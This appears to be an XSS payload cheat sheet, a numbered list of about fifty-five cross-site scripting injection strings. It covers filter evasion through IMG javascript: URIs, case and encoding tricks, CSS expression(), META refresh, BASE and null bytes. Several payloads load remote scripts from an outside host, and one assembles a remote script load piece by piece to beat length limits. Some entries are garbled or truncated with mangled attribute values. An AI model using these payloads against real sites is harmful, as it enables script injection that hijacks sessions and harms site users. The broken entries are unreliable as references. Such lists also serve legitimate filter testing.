(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert boxes
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab to break up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab to break up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have essentially no effect in China, because there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front of the JavaScript
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) JavaScript with escape filtering
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image followed by extra characters (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>